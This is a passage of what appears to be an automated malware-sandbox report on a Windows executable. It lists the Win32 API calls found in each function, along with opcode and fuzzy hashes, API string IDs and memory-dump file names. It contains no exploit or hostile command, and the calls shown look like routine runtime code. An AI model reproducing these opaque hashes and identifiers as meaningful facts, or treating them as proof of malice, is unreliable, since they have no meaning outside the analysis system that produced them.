                                      • Instruction ID: 6d331ad10b7fb09e0b1b9ac925deb209e42d6556e960c6de3880382c7c0b3bf8
                                      • Opcode Fuzzy Hash: 8b67528b897beed40f26bdaa44c730f858f027e4b27ea0faac0772919ca74776
                                      • Instruction Fuzzy Hash: 1051157194020CEFCB11CFA8C884B9DBBB1FF49340F1491ABE5959B261D734EA50CB6A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetPropA.USER32 ref: 00442CA6
                                      • CallWindowProcA.USER32 ref: 00442CD1
                                        • Part of subcall function 004401E0: CallWindowProcA.USER32 ref: 00440206
                                        • Part of subcall function 004401E0: RemovePropA.USER32 ref: 0044021E
                                        • Part of subcall function 004401E0: RemovePropA.USER32 ref: 0044022A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Prop$CallProcRemoveWindow
                                      • String ID:
                                      • API String ID: 2276450057-0
                                      • Opcode ID: a834c6b329f7f72b55205d2c1f7b7db6531291d119d656269ea7bc2b47ea69c4
                                      • Instruction ID: 4e40b68babcb6aca3d269c1a4ddd32acdd729ba96edb34d93745b6cc9cb42b34
                                      • Opcode Fuzzy Hash: a834c6b329f7f72b55205d2c1f7b7db6531291d119d656269ea7bc2b47ea69c4
                                      • Instruction Fuzzy Hash: 99311CB6E0020457F7209A05FD85AAFB398EB96335F840937F90453211D76DAD89827F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SendMessageA.USER32(?,00000138,?,?), ref: 0042E911
                                      • GetBkColor.GDI32(?), ref: 0042E91A
                                      • GetTextColor.GDI32(?), ref: 0042E926
                                      • GetThreadLocale.KERNEL32(0000F1C0), ref: 0042E9B5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Color$LocaleMessageSendTextThread
                                      • String ID:
                                      • API String ID: 1680304473-0
                                      • Opcode ID: f0635388f5368ae657502a509a1e22b09b2b96706088fae6d7fc52b1248721f1
                                      • Instruction ID: bf7b76f6536e0eed2f188dc5e8b980c3b2b0fb25e44c93434d1a66aa7730a144
                                      • Opcode Fuzzy Hash: f0635388f5368ae657502a509a1e22b09b2b96706088fae6d7fc52b1248721f1
                                      • Instruction Fuzzy Hash: EC51B371A10716DFCB20DF16E8405AAB7F0FF04310B60891FF856A76A1D778B945CB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 00438F7B: InitializeCriticalSection.KERNEL32(00000000,00000000,?,?,0043CC56,00000009,?,?,?,0043858B,00000001,00000074,?,0043683B), ref: 00438FB8
                                        • Part of subcall function 00438F7B: EnterCriticalSection.KERNEL32(?,?,?,0043CC56,00000009,?,?,?,0043858B,00000001,00000074,?,0043683B), ref: 00438FD3
                                      • InitializeCriticalSection.KERNEL32(00000068,00000100,00000080,?,00000000,004297D0,004297D0,0043E32B,004297D1,00000000,00000000), ref: 0043DF09
                                      • EnterCriticalSection.KERNEL32(00000068,00000100,00000080,?,00000000,004297D0,004297D0,0043E32B,004297D1,00000000,00000000), ref: 0043DF1E
                                      • LeaveCriticalSection.KERNEL32(00000068,?,00000000,004297D0,004297D0,0043E32B,004297D1,00000000,00000000), ref: 0043DF2B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: CriticalSection$EnterInitialize$Leave
                                      • String ID:
                                      • API String ID: 713024617-3916222277
                                      • Opcode ID: 861395bf9e705e72fae14341c0460e642e3ace1b76ee42f298a9f7a46117f27c
                                      • Instruction ID: d3b6511b414e5803e10135de48c2735a862b888887d52eb8ea6767945a94fd4d
                                      • Opcode Fuzzy Hash: 861395bf9e705e72fae14341c0460e642e3ace1b76ee42f298a9f7a46117f27c
                                      • Instruction Fuzzy Hash: 973126729053015FD3209F24ECC4B5BB7D0AB49329F249A2FF566472E2D778D888C719
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: FreeString$ClearVariant
                                      • String ID:
                                      • API String ID: 3349467263-0
                                      • Opcode ID: f95df874e8e362d64165b844aa0114fd65b8aee60bf34fe9b22eb9aa5c0b7bcc
                                      • Instruction ID: 67eed657a93d079a6dc71f060c19d97e7e4b55ad3b2258be5aaf9d78df9dbb60
                                      • Opcode Fuzzy Hash: f95df874e8e362d64165b844aa0114fd65b8aee60bf34fe9b22eb9aa5c0b7bcc
                                      • Instruction Fuzzy Hash: 7E314875A01218AFCB14DFA5C884EDEBBB8FF08754F50812AF508A6250D774A984CFA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0044B58A: GetParent.USER32(?), ref: 0044B5BD
                                        • Part of subcall function 0044B58A: GetLastActivePopup.USER32(?), ref: 0044B5CC
                                        • Part of subcall function 0044B58A: IsWindowEnabled.USER32(?), ref: 0044B5E1
                                        • Part of subcall function 0044B58A: EnableWindow.USER32(?,00000000), ref: 0044B5F4
                                      • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 0044B448
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,00000000), ref: 0044B4B6
                                      • MessageBoxA.USER32 ref: 0044B4C4
                                      • EnableWindow.USER32(00000000,00000001), ref: 0044B4E0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Window$EnableMessage$ActiveEnabledFileLastModuleNameParentPopupSend
                                      • String ID:
                                      • API String ID: 1958756768-0
                                      • Opcode ID: 5e1648d3ba3878ca7e40aa48709f20328752c3879076c2051202c4b80343edfd
                                      • Instruction ID: e4cc0cd26b021f80ffb85e5c022fb857e680b74358b8f4a4fa587f51755a2e3e
                                      • Opcode Fuzzy Hash: 5e1648d3ba3878ca7e40aa48709f20328752c3879076c2051202c4b80343edfd
                                      • Instruction Fuzzy Hash: 50218272A00208ABEB20DFA5CCC1BAEB7B9EB44354F14446AF650E3252C778DD408BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • lstrcpynA.KERNEL32(00449E21,?,00000104,?,?,?,?,?,?,?,00449E0F,?), ref: 00449E4F
                                      • GetFileTime.KERNEL32(00000000,00449E0F,?,?,?,?,?,?,?,?,?,00449E0F,?), ref: 00449E70
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00449E0F,?), ref: 00449E7F
                                      • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,00449E0F,?), ref: 00449EA0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: File$AttributesSizeTimelstrcpyn
                                      • String ID:
                                      • API String ID: 1499663573-0
                                      • Opcode ID: 890932de0ac3b0bce48018eab991eed3ca4d0963c59e5fd7c23c5cc88624ecca
                                      • Instruction ID: 7aaf32ab8d7a2899719801dbdd4ef9135f4c96c6dbdf950de52e1e7297c202fe
                                      • Opcode Fuzzy Hash: 890932de0ac3b0bce48018eab991eed3ca4d0963c59e5fd7c23c5cc88624ecca
                                      • Instruction Fuzzy Hash: 393180B2500605AFE720DFA5C885BABBBB8BB14311F10492FF156D7690DB74E984CB94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetVersion.KERNEL32 ref: 004367F1
                                        • Part of subcall function 0043900C: HeapCreate.KERNELBASE(00000000,00001000,00000000,00436829,00000001), ref: 0043901D
                                        • Part of subcall function 0043900C: HeapDestroy.KERNEL32 ref: 0043903B
                                      • GetCommandLineA.KERNEL32 ref: 00436851
                                      • GetStartupInfoA.KERNEL32(?), ref: 0043687C
                                      • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 0043689F
                                        • Part of subcall function 004368F8: ExitProcess.KERNEL32 ref: 00436915
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                      • String ID:
                                      • API String ID: 2057626494-0
                                      • Opcode ID: 91b0f543fc85fcc470683452b9434a51f0611b18f0c411177d2b1b4e9f734bda
                                      • Instruction ID: 6d894ef55fc57fbde16c7f7b25bc0d2537ac2592af84e1baa4634e1fd2d221f7
                                      • Opcode Fuzzy Hash: 91b0f543fc85fcc470683452b9434a51f0611b18f0c411177d2b1b4e9f734bda
                                      • Instruction Fuzzy Hash: 6621A5B1C00705AFDB18BFA69C46B6E7BA8EF0C704F10552FF5059A2A1DB788440CB98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetPropA.USER32 ref: 00440ABD
                                      • SendMessageA.USER32(?,00001944,00000000,?), ref: 00440AE2
                                      • SendMessageA.USER32(?,00001943,00000000,?), ref: 00440AF7
                                      • RemovePropA.USER32 ref: 00440B0D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: MessagePropSend$Remove
                                      • String ID:
                                      • API String ID: 2793251306-0
                                      • Opcode ID: 98508c3e9d79bb3212fd2ae2c32650a6eaec0ba1258c7769647f98e91735da6c
                                      • Instruction ID: c89b0fe541cf7dde9ed864f93de2c00e7d19237f7beae416ceb8af7dae3b0204
                                      • Opcode Fuzzy Hash: 98508c3e9d79bb3212fd2ae2c32650a6eaec0ba1258c7769647f98e91735da6c
                                      • Instruction Fuzzy Hash: 691177795003107EF200AB11AC05FBB739CEB85759F004429FE1596251E27CA95ACBAF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CallNextHookEx.USER32(00000000,?,?,?), ref: 0044010B
                                      • UnhookWindowsHookEx.USER32(00000000), ref: 00440124
                                      • GetWindowLongA.USER32 ref: 0044013B
                                      • SendMessageA.USER32(00000001,000011F0,00000000,00000001), ref: 00440165
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp
                                      Similarity
                                      • API ID: Hook$CallLongMessageNextSendUnhookWindowWindows
                                      • String ID:
                                      • API String ID: 4187046592-0
                                      • Opcode ID: d9070a7cd65ff2c3448befe2fbc8fbd7171ef581ee0bf51f3b4f66425f8333b2
                                      • Instruction ID: 84bca165df897bd3f65c6e1caffb1f0e071b275131642ef42da4b7d0ffc52013
                                      • Opcode Fuzzy Hash: d9070a7cd65ff2c3448befe2fbc8fbd7171ef581ee0bf51f3b4f66425f8333b2
                                      • Instruction Fuzzy Hash: CE1119B5500700AFD714DB18EC58B67B7E9AB84355F008929F649832B0D734E885CF69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetClassInfoA.USER32 ref: 004454E5
                                      • RegisterClassA.USER32 ref: 004454F0
                                      • lstrcatA.KERNEL32(00000034,?,00000001), ref: 00445527
                                      • lstrcatA.KERNEL32(00000034,?), ref: 00445535
                                      Similarity
                                      • API ID: Classlstrcat$InfoRegister
                                      • String ID:
                                      • API String ID: 345206450-0
                                      • Opcode ID: 5a911abe35439fedc478e85b35063dc36883a4b28d769952504e9e71227f38e3
                                      • Instruction ID: 6fc6ab3d266a5d1752e608cfcd99d39eb2a44e527625aaab118b33007cd26da0
                                      • Opcode Fuzzy Hash: 5a911abe35439fedc478e85b35063dc36883a4b28d769952504e9e71227f38e3
                                      • Instruction Fuzzy Hash: DB112571901614BFEF00AF659841BAE7BB8AF05314F00852BF412A7152C778DA048B68
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 004405D6
                                      • EnterCriticalSection.KERNEL32(00472D20), ref: 004405E3
                                      • UnhookWindowsHookEx.USER32(?), ref: 00440626
                                      • LeaveCriticalSection.KERNEL32(00472D20), ref: 0044066B
                                      Similarity
                                      • API ID: CriticalSection$CurrentEnterHookLeaveThreadUnhookWindows
                                      • String ID:
                                      • API String ID: 1197249173-0
                                      • Opcode ID: 593c8fe717b099abc742654879408583769eda46ebebaebd75f053c0f0ceee72
                                      • Instruction ID: 00f3de51f772b12f2b2f72a0797674bb85c2975d1a871e2d4dc8f7e778efc85b
                                      • Opcode Fuzzy Hash: 593c8fe717b099abc742654879408583769eda46ebebaebd75f053c0f0ceee72
                                      • Instruction Fuzzy Hash: 57118530100608AFE730AF65EA48A6673B5EB90316F01447BF65E87621D7B9ACB0CF5C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00449799
                                      • GetCurrentProcess.KERNEL32(?,00000000), ref: 0044979F
                                      • DuplicateHandle.KERNEL32(00000000), ref: 004497A2
                                      • GetLastError.KERNEL32(00000000), ref: 004497BC
                                      Similarity
                                      • API ID: CurrentProcess$DuplicateErrorHandleLast
                                      • String ID:
                                      • API String ID: 3907606552-0
                                      • Opcode ID: 814b8f62384c2fbeac6304deea51b44d196b2ea89e67d0868a4bc23a8bddd975
                                      • Instruction ID: 2e38be2a2c297f566f78e94dc3235bd2b4a2076bdca5851586d0c1c7558476bf
                                      • Opcode Fuzzy Hash: 814b8f62384c2fbeac6304deea51b44d196b2ea89e67d0868a4bc23a8bddd975
                                      • Instruction Fuzzy Hash: 7E01D431700200BBFB10AFAACC8AF5B7B9DDF84751F104526F515CB291DAB4DC009764
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetDlgItem.USER32 ref: 00445EB1
                                      • GetTopWindow.USER32(00000000), ref: 00445EC4
                                      • GetTopWindow.USER32(?), ref: 00445EF4
                                      • GetWindow.USER32(00000000,00000002), ref: 00445F0F
                                      Similarity
                                      • API ID: Window$Item
                                      • String ID:
                                      • API String ID: 369458955-0
                                      • Opcode ID: e105e0fb4d5564b5f19d866ba0a83c314ed6d7099a93a93f7be1d2d5cc744fc5
                                      • Instruction ID: 4e0c952f3bd25881490f6ead522ea49f2a255526e88217ff8f9e1fcab5a99914
                                      • Opcode Fuzzy Hash: e105e0fb4d5564b5f19d866ba0a83c314ed6d7099a93a93f7be1d2d5cc744fc5
                                      • Instruction Fuzzy Hash: 94018F36005A1AB7EF222B628C00E9F3B59AF51356F104426FC0091223DB39CE159AEA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetTopWindow.USER32(?), ref: 00445F2D
                                      • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00445F63
                                      • GetTopWindow.USER32(00000000), ref: 00445F70
                                      • GetWindow.USER32(00000000,00000002), ref: 00445F8E
                                      Similarity
                                      • API ID: Window$MessageSend
                                      • String ID:
                                      • API String ID: 1496643700-0
                                      • Opcode ID: 386d8f902f1017d435b64220adcc697db0cc4bbcd19f4b9950acd62fa1037df7
                                      • Instruction ID: 0156151debdae8ec3492d7c75ddd89bc7f2ed4c971156e0bf19d426a838d3860
                                      • Opcode Fuzzy Hash: 386d8f902f1017d435b64220adcc697db0cc4bbcd19f4b9950acd62fa1037df7
                                      • Instruction Fuzzy Hash: C6011E36005A19BBDF126F91DC05EDF3B29EF45351F044416FA0055122C73AC93AEFAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Similarity
                                      • API ID: Item$EnableFocusMenuNextParent
                                      • String ID:
                                      • API String ID: 988757621-0
                                      • Opcode ID: fc0e464e8a8e8943b128fc476aa8c7f230683c55a6beb2071cd77f77bc1a52f2
                                      • Instruction ID: 9d2b2e5d50156d970f3b7737010b5b533b6169e73f648ba0dcd5c7970c14821d
                                      • Opcode Fuzzy Hash: fc0e464e8a8e8943b128fc476aa8c7f230683c55a6beb2071cd77f77bc1a52f2
                                      • Instruction Fuzzy Hash: F0116171108701AFEB289F21DC59B6BB7B5EF40315F104A2EF14287AB1CB78E846CB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 00440816
                                      • EnterCriticalSection.KERNEL32(00472D20), ref: 00440823
                                      • UnhookWindowsHookEx.USER32(?), ref: 0044085A
                                      • LeaveCriticalSection.KERNEL32(00472D20), ref: 00440899
                                      Similarity
                                      • API ID: CriticalSection$CurrentEnterHookLeaveThreadUnhookWindows
                                      • String ID:
                                      • API String ID: 1197249173-0
                                      • Opcode ID: fd159f8465ff88b3f65a5c27b4658958d6c432b18b529a1a76338f755d0293ad
                                      • Instruction ID: e64b43909e64fb2d070c8aa3cc4862f3f33bec617a0fa23f51894a9a28f582eb
                                      • Opcode Fuzzy Hash: fd159f8465ff88b3f65a5c27b4658958d6c432b18b529a1a76338f755d0293ad
                                      • Instruction Fuzzy Hash: 60019231500A189FE730AF65EB44A6637B4EB84356F00407BF64E93221D7B5AC61CF98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 0044B883
                                      • RegCloseKey.ADVAPI32(00000000,?,?), ref: 0044B88C
                                      • wsprintfA.USER32 ref: 0044B8A8
                                      • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0044B8C1
                                      Similarity
                                      • API ID: ClosePrivateProfileStringValueWritewsprintf
                                      • String ID:
                                      • API String ID: 1902064621-0
                                      • Opcode ID: 4772d56c0b8c8ebc557b3ab47f137df3ebd5c65d72db09eb4d9faf18d499cea9
                                      • Instruction ID: 5096a92816ae1159df7c26d585568b6ba144e845e5c15ad2e572a389ad05487d
                                      • Opcode Fuzzy Hash: 4772d56c0b8c8ebc557b3ab47f137df3ebd5c65d72db09eb4d9faf18d499cea9
                                      • Instruction Fuzzy Hash: 29018F72400219ABDB126B64DC09FEB3BACEF04755F044436FA15E60A2E774D914CB88
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetObjectA.GDI32(00000000,0000000C,?), ref: 00446591
                                      • SetBkColor.GDI32(00000000,00000000), ref: 0044659D
                                      • GetSysColor.USER32(00000008), ref: 004465AD
                                      • SetTextColor.GDI32(00000000,?), ref: 004465B7
                                        • Part of subcall function 0044ACAC: GetWindowLongA.USER32 ref: 0044ACBD
                                      Similarity
                                      • API ID: Color$LongObjectTextWindow
                                      • String ID:
                                      • API String ID: 2871169696-0
                                      • Opcode ID: feb3fe680bc6365230c7ad2b378acea959a5f468b1812fc5eef502c03f13e7ca
                                      • Instruction ID: cdf3ea109c339b1207720942c9d72f829f9205d7df180ad5f7ad02bf1a78e847
                                      • Opcode Fuzzy Hash: feb3fe680bc6365230c7ad2b378acea959a5f468b1812fc5eef502c03f13e7ca
                                      • Instruction Fuzzy Hash: 08014B30200208BBEF219F64FC49BAF3BA4EB02351F154522F906D52F9C734CDA8CA5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetWindowExtEx.GDI32(?,0042F48D,00000000,?,?,?,0042F48D,?,?,?,?,?,?,00000000,00000000), ref: 0044A810
                                      • GetViewportExtEx.GDI32(?,?,?,0042F48D,?,?,?,?,?,?,00000000,00000000), ref: 0044A81D
                                      • MulDiv.KERNEL32(0042F48D,00000000,00000000), ref: 0044A842
                                      • MulDiv.KERNEL32(46892C46,00000000,00000000), ref: 0044A85D
                                      Similarity
                                      • API ID: ViewportWindow
                                      • String ID:
                                      • API String ID: 1589084482-0
                                      • Opcode ID: cb1038ddb76810cabed36e5e7bd15283ebe3585dc991432874dbdf68880c38fa
                                      • Instruction ID: 3736933c803cc12f6b6a3f4e1255a8e399edc31ce3e6a16d17c058ec57f49d16
                                      • Opcode Fuzzy Hash: cb1038ddb76810cabed36e5e7bd15283ebe3585dc991432874dbdf68880c38fa
                                      • Instruction Fuzzy Hash: BAF06972400209BFEB14BBA1DC068BEBBBDFF45310B11842AF851A3171EB71AD609B54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetWindowExtEx.GDI32(?,?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000,00000000), ref: 0044A879
                                      • GetViewportExtEx.GDI32(?,?,?,?,?,?,?,00000000,00000000), ref: 0044A886
                                      • MulDiv.KERNEL32(?,00000000,00000000), ref: 0044A8AB
                                      • MulDiv.KERNEL32(00000002,00000000,00000000), ref: 0044A8C6
                                      Similarity
                                      • API ID: ViewportWindow
                                      • String ID:
                                      • API String ID: 1589084482-0
                                      • Opcode ID: 3cbbe98c668a292e28d969f87a768f8eca605d98446189cac795b8973fc5bf74
                                      • Instruction ID: 7c34968ab5ce9fd9e8e89db1fad6978d1bdcc6211f5ed9ff61f13ec077ebfb20
                                      • Opcode Fuzzy Hash: 3cbbe98c668a292e28d969f87a768f8eca605d98446189cac795b8973fc5bf74
                                      • Instruction Fuzzy Hash: 43F06972400209BFEB14BBA1DC068BEBBBDFF45310B11842AF851A3171EB71AD609B54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SysStringLen.OLEAUT32(?), ref: 0044DADD
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,0044E85C,00000000), ref: 0044DAF5
                                      • SysAllocStringByteLen.OLEAUT32(00000000,00000000), ref: 0044DAFD
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,00000000,?,?,?,0044E85C,00000000), ref: 0044DB12
                                      Similarity
                                      • API ID: Byte$CharMultiStringWide$Alloc
                                      • String ID:
                                      • API String ID: 3384502665-0
                                      • Opcode ID: 000e05d519f099953e6a5f929d717b7ea7e06750d62c1a9c5e4bbecdc3953320
                                      • Instruction ID: 339457101daa611ffdcb3c9ede53cb01d1760a012422e6ced851854f9c9a4e87
                                      • Opcode Fuzzy Hash: 000e05d519f099953e6a5f929d717b7ea7e06750d62c1a9c5e4bbecdc3953320
                                      • Instruction Fuzzy Hash: 0EF0F8B21062287F92205B67DC4CCEBBF9CEE8B2B6F01452AF548D2111C6759801CBF5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: TextWindow$lstrcmplstrlen
                                      • String ID:
                                      • API String ID: 330964273-0
                                      • Opcode ID: 3ce39f0237db690a67c3e085ebbab314c35ed9da7ea06969e2a1ef79f4b8e839
                                      • Instruction ID: d159fd11c34e6da770562f6171c22fac6869b6cf0de0363decb2bdc371c77f40
                                      • Instruction Fuzzy Hash: 65F05E75400118ABEF226F20DC08BDA7B6AEB08392F008162F846D1120D774CD909B99

                                      APIs
                                      • GetTickCount.KERNEL32 ref: 0044DA5B
                                      • GetTickCount.KERNEL32 ref: 0044DA68
                                      • CoFreeUnusedLibraries.OLE32 ref: 0044DA77
                                      • GetTickCount.KERNEL32 ref: 0044DA7D
                                        • Part of subcall function 0044D9DE: CoFreeUnusedLibraries.OLE32(00000000), ref: 0044DA26
                                        • Part of subcall function 0044D9DE: OleUninitialize.OLE32 ref: 0044DA2C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: CountTick$FreeLibrariesUnused$Uninitialize
                                      • String ID:
                                      • API String ID: 685759847-0
